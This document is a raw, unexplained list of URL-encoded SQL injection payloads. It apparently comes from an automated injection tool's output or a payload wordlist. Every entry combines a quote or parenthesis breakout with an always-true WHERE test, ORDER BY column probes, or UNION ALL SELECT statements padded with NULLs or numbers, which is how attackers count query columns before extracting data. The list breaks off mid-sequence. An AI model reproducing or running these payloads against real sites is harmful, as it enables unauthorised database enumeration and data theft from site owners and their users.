foo%22%29%20WHERE%208515%3D8515%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%22%29%20WHERE%207375%3D7375%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208193%3D8193%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201221%3D1221%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%209817%3D9817%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201765%3D1765%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201723%3D1723%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208295%3D8295%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201365%3D1365%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%204678%3D4678%20ORDER%20BY%201--%20 foo%29%20WHERE%208932%3D8932%20ORDER%20BY%205419--%20 foo%29%20WHERE%207270%3D7270%20UNION%20ALL%20SELECT%20NULL--%20 foo%29%20WHERE%205126%3D5126%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%29%20WHERE%204022%3D4022%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%29%20WHERE%203272%3D3272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201449%3D1449%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%207541%3D7541%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%209598%3D9598%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%204374%3D4374%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%208528%3D8528%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%204272%3D4272%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204373%3D4373%20ORDER%20BY%201--%20 foo%27%20WHERE%209499%3D9499%20ORDER%20BY%202924--%20 foo%27%20WHERE%207650%3D7650%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%20WHERE%206363%3D6363%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%20WHERE%203012%3D3012%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%20WHERE%205330%3D5330%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%209907%3D9907%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201883%3D1883%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%207301%3D7301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204473%3D4473%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%208379%3D8379%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%205788%3D5788%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204522%3D4522%20ORDER%20BY%201--%20 foo%22%20WHERE%202774%3D2774%20ORDER%20BY%209575--%20 foo%22%20WHERE%204690%3D4690%20UNION%20ALL%20SELECT%20NULL--%20 foo%22%20WHERE%203240%3D3240%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%22%20WHERE%209940%3D9940%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202204%3D2204%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%201632%3D1632%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204941%3D4941%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%206638%3D6638%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207897%3D7897%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205992%3D5992%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%209770%3D9770%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%204955%3D4955%20ORDER%20BY%201--%20 foo%20WHERE%201582%3D1582%20ORDER%20BY%205145--%20 foo%20WHERE%204177%3D4177%20UNION%20ALL%20SELECT%20NULL--%20 foo%20WHERE%201177%3D1177%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%20WHERE%203240%3D3240%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%20WHERE%209398%3D9398%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%208729%3D8729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202663%3D2663%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%201601%3D1601%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%201198%3D1198%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%209702%3D9702%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203627%3D3627%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27FcEL%27%20FROM%20DUAL%20WHERE%209188%3D9188%20ORDER%20BY%201--%20 foo%27%7C%7C%28SELECT%20%27IWqE%27%20FROM%20DUAL%20WHERE%204055%3D4055%20ORDER%20BY%202968--%20 foo%27%7C%7C%28SELECT%20%27eNzF%27%20FROM%20DUAL%20WHERE%207622%3D7622%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%7C%7C%28SELECT%20%27gKhC%27%20FROM%20DUAL%20WHERE%202358%3D2358%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27Llru%27%20FROM%20DUAL%20WHERE%205801%3D5801%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27cjjo%27%20FROM%20DUAL%20WHERE%205161%3D5161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27Nkul%27%20FROM%20DUAL%20WHERE%203356%3D3356%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27rczI%27%20FROM%20DUAL%20WHERE%207239%3D7239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27qHXS%27%20FROM%20DUAL%20WHERE%209419%3D9419%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27pBxl%27%20FROM%20DUAL%20WHERE%208278%3D8278%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27tYNv%27%20FROM%20DUAL%20WHERE%205015%3D5015%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27zNIS%27%20FROM%20DUAL%20WHERE%204700%3D4700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27gnpx%27%20WHERE%205853%3D5853%20ORDER%20BY%201--%20 foo%27%7C%7C%28SELECT%20%27deAx%27%20WHERE%206702%3D6702%20ORDER%20BY%201458--%20 foo%27%7C%7C%28SELECT%20%27hIAU%27%20WHERE%202794%3D2794%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%7C%7C%28SELECT%20%27LCQU%27%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27NxkF%27%20WHERE%206712%3D6712%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27Czpa%27%20WHERE%203584%3D3584%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27BcvS%27%20WHERE%206950%3D6950%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27JPcR%27%20WHERE%204597%3D4597%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27DbnU%27%20WHERE%203531%3D3531%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27rSaE%27%20WHERE%209596%3D9596%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27uRGK%27%20WHERE%206618%3D6618%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27YaWV%27%20WHERE%206992%3D6992%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20Nvsr%20WHERE%206491%3D6491%20ORDER%20BY%201--%20 foo%27%2B%28SELECT%20vaMU%20WHERE%205207%3D5207%20ORDER%20BY%207695--%20 foo%27%2B%28SELECT%20WpWP%20WHERE%208921%3D8921%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%2B%28SELECT%20LKKt%20WHERE%206378%3D6378%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%2B%28SELECT%20Xasj%20WHERE%205398%3D5398%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20OeLn%20WHERE%202072%3D2072%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20tHqx%20WHERE%209406%3D9406%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20gTxZ%20WHERE%201622%3D1622%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20tozk%20WHERE%208889%3D8889%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20gapE%20WHERE%203814%3D3814%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20EJJj%20WHERE%201740%3D1740%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20tDww%20WHERE%209906%3D9906%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27TwDo%27%20WHERE%208967%3D8967%20ORDER%20BY%201--%20 foo%27%2B%28SELECT%20%27rHtT%27%20WHERE%206224%3D6224%20ORDER%20BY%208167--%20 foo%27%2B%28SELECT%20%27SVwy%27%20WHERE%204975%3D4975%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%2B%28SELECT%20%27JJMd%27%20WHERE%207179%3D7179%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%2B%28SELECT%20%27btlT%27%20WHERE%207375%3D7375%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27hilb%27%20WHERE%207743%3D7743%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27PRdL%27%20WHERE%201909%3D1909%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27fSWm%27%20WHERE%203882%3D3882%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27CSTt%27%20WHERE%207984%3D7984%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27wumy%27%20WHERE%204949%3D4949%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27vysD%27%20WHERE%202571%3D2571%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%2B%28SELECT%20%27spXk%27%20WHERE%202590%3D2590%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%205061--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -2711%29%20ORDER%20BY%201--%20 -7938%29%20ORDER%20BY%207226--%20 -4648%29%20UNION%20ALL%20SELECT%202476--%20 -2952%29%20UNION%20ALL%20SELECT%208780%2C8780--%20 -5793%29%20UNION%20ALL%20SELECT%202239%2C2239%2C2239--%20 -6261%29%20UNION%20ALL%20SELECT%205167%2C5167%2C5167%2C5167--%20 -2884%29%20UNION%20ALL%20SELECT%205126%2C5126%2C5126%2C5126%2C5126--%20 -8398%29%20UNION%20ALL%20SELECT%202752%2C2752%2C2752%2C2752%2C2752%2C2752--%20 -3137%29%20UNION%20ALL%20SELECT%205200%2C5200%2C5200%2C5200%2C5200%2C5200%2C5200--%20 -7661%29%20UNION%20ALL%20SELECT%201703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703%2C1703--%20 -2711%29%20UNION%20ALL%20SELECT%206738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738%2C6738--%20 -4983%29%20UNION%20ALL%20SELECT%206742%2C6742%2C6742%2C6742%2C6742%2C6742%2C6742%2C6742%2C6742%2C6742--%20 -1366%27%29%20ORDER%20BY%201--%20 -9515%27%29%20ORDER%20BY%205260--%20 -1276%27%29%20UNION%20ALL%20SELECT%208994--%20 -5132%27%29%20UNION%20ALL%20SELECT%204209%2C4209--%20 -8357%27%29%20UNION%20ALL%20SELECT%204150%2C4150%2C4150--%20 -5223%27%29%20UNION%20ALL%20SELECT%204541%2C4541%2C4541%2C4541--%20 -6076%27%29%20UNION%20ALL%20SELECT%204133%2C4133%2C4133%2C4133%2C4133--%20 -6741%27%29%20UNION%20ALL%20SELECT%204407%2C4407%2C4407%2C4407%2C4407%2C4407--%20 -6206%27%29%20UNION%20ALL%20SELECT%202351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351--%20 -8481%27%29%20UNION%20ALL%20SELECT%201988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988%2C1988--%20 -1189%27%29%20UNION%20ALL%20SELECT%205181%2C5181%2C5181%2C5181%2C5181%2C5181%2C5181%2C5181%2C5181--%20 -4510%27%29%20UNION%20ALL%20SELECT%204334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334%2C4334--%20 -5661%27%20ORDER%20BY%201--%20 -3644%27%20ORDER%20BY%207803--%20 -4529%27%20UNION%20ALL%20SELECT%205811--%20 -2233%27%20UNION%20ALL%20SELECT%205783%2C5783--%20 -8363%27%20UNION%20ALL%20SELECT%204751%2C4751%2C4751--%20 -5729%27%20UNION%20ALL%20SELECT%209498%2C9498%2C9498%2C9498--%20 -3277%27%20UNION%20ALL%20SELECT%209172%2C9172%2C9172%2C9172%2C9172--%20 -7098%27%20UNION%20ALL%20SELECT%201624%2C1624%2C1624%2C1624%2C1624%2C1624--%20 -1711%27%20UNION%20ALL%20SELECT%201723%2C1723%2C1723%2C1723%2C1723%2C1723%2C1723--%20 -5626%27%20UNION%20ALL%20SELECT%206042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042%2C6042--%20 -9069%27%20UNION%20ALL%20SELECT%209001%2C9001%2C9001%2C9001%2C9001%2C9001%2C9001%2C9001%2C9001--%20 -4987%27%20UNION%20ALL%20SELECT%205194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194%2C5194--%20 -7764%22%20ORDER%20BY%201--%20 -7804%22%20ORDER%20BY%209021--%20 -5687%22%20UNION%20ALL%20SELECT%208702--%20 -8237%22%20UNION%20ALL%20SELECT%203148%2C3148--%20 -2707%22%20UNION%20ALL%20SELECT%201352%2C1352%2C1352--%20 -9116%22%20UNION%20ALL%20SELECT%206084%2C6084%2C6084%2C6084--%20 -2346%22%20UNION%20ALL%20SELECT%204497%2C4497%2C4497%2C4497%2C4497--%20 -6730%22%20UNION%20ALL%20SELECT%209734%2C9734%2C9734%2C9734%2C9734%2C9734--%20 -7432%22%20UNION%20ALL%20SELECT%203230%2C3230%2C3230%2C3230%2C3230%2C3230%2C3230--%20 -3071%22%20UNION%20ALL%20SELECT%208934%2C8934%2C8934%2C8934%2C8934%2C8934%2C8934%2C8934--%20 -8340%22%20UNION%20ALL%20SELECT%203659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659%2C3659--%20 -5249%22%20UNION%20ALL%20SELECT%201682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682%2C1682--%20 -7870%29%20ORDER%20BY%201--%20 -1105%29%20ORDER%20BY%204746--%20 -3972%29%20UNION%20ALL%20SELECT%202214--%20 -2351%29%20UNION%20ALL%20SELECT%201128%2C1128--%20 -1761%29%20UNION%20ALL%20SELECT%202218%2C2218%2C2218--%20 -4363%29%20UNION%20ALL%20SELECT%206471%2C6471%2C6471%2C6471--%20 -3815%29%20UNION%20ALL%20SELECT%205097%2C5097%2C5097%2C5097%2C5097--%20 -4540%29%20UNION%20ALL%20SELECT%207035%2C7035%2C7035%2C7035%2C7035%2C7035--%20 -2857%29%20UNION%20ALL%20SELECT%204248%2C4248%2C4248%2C4248%2C4248%2C4248%2C4248--%20 -5575%29%20UNION%20ALL%20SELECT%207967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967%2C7967--%20 -1724%29%20UNION%20ALL%20SELECT%204521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521%2C4521--%20 -8055%29%20UNION%20ALL%20SELECT%209197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197%2C9197--%20 -1756%29%29%20ORDER%20BY%201--%20 -3795%29%29%20ORDER%20BY%205687--%20 -3309%29%29%20UNION%20ALL%20SELECT%209848--%20 -7729%29%29%20UNION%20ALL%20SELECT%203381%2C3381--%20 -3258%29%29%20UNION%20ALL%20SELECT%206062%2C6062%2C6062--%20 -5682%29%29%20UNION%20ALL%20SELECT%208991%2C8991%2C8991%2C8991--%20 -1710%29%29%20UNION%20ALL%20SELECT%204199%2C4199%2C4199%2C4199%2C4199--%20 -4711%29%29%20UNION%20ALL%20SELECT%202366%2C2366%2C2366%2C2366%2C2366%2C2366--%20 -4666%29%29%20UNION%20ALL%20SELECT%203051%2C3051%2C3051%2C3051%2C3051%2C3051%2C3051--%20 -4135%29%29%20UNION%20ALL%20SELECT%201077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077%2C1077--%20 -4981%29%29%20UNION%20ALL%20SELECT%201757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757--%20 -3691%29%29%20UNION%20ALL%20SELECT%205169%2C5169%2C5169%2C5169%2C5169%2C5169%2C5169%2C5169%2C5169%2C5169--%20 -4380%29%29%29%20ORDER%20BY%201--%20 -3616%29%29%29%20ORDER%20BY%207615--%20 -1795%29%29%29%20UNION%20ALL%20SELECT%202593--%20 -6952%29%29%29%20UNION%20ALL%20SELECT%208787%2C8787--%20 -6702%29%29%29%20UNION%20ALL%20SELECT%209375%2C9375%2C9375--%20 -5010%29%29%29%20UNION%20ALL%20SELECT%203263%2C3263%2C3263%2C3263--%20 -3396%29%29%29%20UNION%20ALL%20SELECT%209242%2C9242%2C9242%2C9242%2C9242--%20 -6822%29%29%29%20UNION%20ALL%20SELECT%204191%2C4191%2C4191%2C4191%2C4191%2C4191--%20 -5525%29%29%29%20UNION%20ALL%20SELECT%208637%2C8637%2C8637%2C8637%2C8637%2C8637%2C8637--%20 -2546%29%29%29%20UNION%20ALL%20SELECT%208436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436--%20 -8388%29%29%29%20UNION%20ALL%20SELECT%208382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382%2C8382--%20 -7248%29%29%29%20UNION%20ALL%20SELECT%208756%2C8756%2C8756%2C8756%2C8756%2C8756%2C8756%2C8756%2C8756%2C8756--%20 -3691%20ORDER%20BY%201--%20 -7661%20ORDER%20BY%202872--%20 -1234%20UNION%20ALL%20SELECT%204818--%20 -5515%20UNION%20ALL%20SELECT%207595%2C7595--%20 -8981%20UNION%20ALL%20SELECT%206262%2C6262%2C6262--%20 -9170%20UNION%20ALL%20SELECT%208911%2C8911%2C8911%2C8911--%20 -6815%20UNION%20ALL%20SELECT%202519%2C2519%2C2519%2C2519%2C2519--%20 -4595%20UNION%20ALL%20SELECT%201509%2C1509%2C1509%2C1509%2C1509%2C1509--%20 -8352%20UNION%20ALL%20SELECT%205698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698--%20 -9996%20UNION%20ALL%20SELECT%206948%2C6948%2C6948%2C6948%2C6948%2C6948%2C6948%2C6948--%20 -6762%20UNION%20ALL%20SELECT%203616%2C3616%2C3616%2C3616%2C3616%2C3616%2C3616%2C3616%2C3616--%20 -6631%20UNION%20ALL%20SELECT%206379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379%2C6379--%20 -1820%27%29%20ORDER%20BY%201--%20 -1136%27%29%20ORDER%20BY%206971--%20 -2398%27%29%20UNION%20ALL%20SELECT%206989--%20 -9370%27%29%20UNION%20ALL%20SELECT%201818%2C1818--%20 -3688%27%29%20UNION%20ALL%20SELECT%208579%2C8579%2C8579--%20 -9484%27%29%20UNION%20ALL%20SELECT%202534%2C2534%2C2534%2C2534--%20 -9173%27%29%20UNION%20ALL%20SELECT%206023%2C6023%2C6023%2C6023%2C6023--%20 -3624%27%29%20UNION%20ALL%20SELECT%202196%2C2196%2C2196%2C2196%2C2196%2C2196--%20 -7466%27%29%20UNION%20ALL%20SELECT%209132%2C9132%2C9132%2C9132%2C9132%2C9132%2C9132--%20 -4408%27%29%20UNION%20ALL%20SELECT%207217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217%2C7217--%20 -8913%27%29%20UNION%20ALL%20SELECT%206645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645%2C6645--%20 -7324%27%29%20UNION%20ALL%20SELECT%208361%2C8361%2C8361%2C8361%2C8361%2C8361%2C8361%2C8361%2C8361%2C8361--%20 -8828%27%29%29%20ORDER%20BY%201--%20 -3226%27%29%29%20ORDER%20BY%201611--%20 -2067%27%29%29%20UNION%20ALL%20SELECT%202848--%20 -2903%27%29%29%20UNION%20ALL%20SELECT%207352%2C7352--%20 -2943%27%29%29%20UNION%20ALL%20SELECT%208474%2C8474%2C8474--%20 -6033%27%29%29%20UNION%20ALL%20SELECT%203027%2C3027%2C3027%2C3027--%20 -5222%27%29%29%20UNION%20ALL%20SELECT%202763%2C2763%2C2763%2C2763%2C2763--%20 -6345%27%29%29%20UNION%20ALL%20SELECT%203330%2C3330%2C3330%2C3330%2C3330%2C3330--%20 -8181%27%29%29%20UNION%20ALL%20SELECT%201601%2C1601%2C1601%2C1601%2C1601%2C1601%2C1601--%20 -1596%27%29%29%20UNION%20ALL%20SELECT%202524%2C2524%2C2524%2C2524%2C2524%2C2524%2C2524%2C2524--%20 -3021%27%29%29%20UNION%20ALL%20SELECT%201161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161--%20 -4001%27%29%29%20UNION%20ALL%20SELECT%203515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515%2C3515--%20 -2745%27%29%29%29%20ORDER%20BY%201--%20 -5785%27%29%29%29%20ORDER%20BY%207980--%20 -6367%27%29%29%29%20UNION%20ALL%20SELECT%209608--%20 -4830%27%29%29%29%20UNION%20ALL%20SELECT%204401%2C4401--%20 -8144%27%29%29%29%20UNION%20ALL%20SELECT%201862%2C1862%2C1862--%20 -2565%27%29%29%29%20UNION%20ALL%20SELECT%206291%2C6291%2C6291%2C6291--%20 -6279%27%29%29%29%20UNION%20ALL%20SELECT%207174%2C7174%2C7174%2C7174%2C7174--%20 -4556%27%29%29%29%20UNION%20ALL%20SELECT%202989%2C2989%2C2989%2C2989%2C2989%2C2989--%20 -4419%27%29%29%29%20UNION%20ALL%20SELECT%205146%2C5146%2C5146%2C5146%2C5146%2C5146%2C5146--%20 -6771%27%29%29%29%20UNION%20ALL%20SELECT%204021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021%2C4021--%20 -6073%27%29%29%29%20UNION%20ALL%20SELECT%202008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008%2C2008--%20 -3796%27%29%29%29%20UNION%20ALL%20SELECT%207297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297%2C7297--%20 -1537%27%20ORDER%20BY%201--%20 -5577%27%20ORDER%20BY%201956--%20 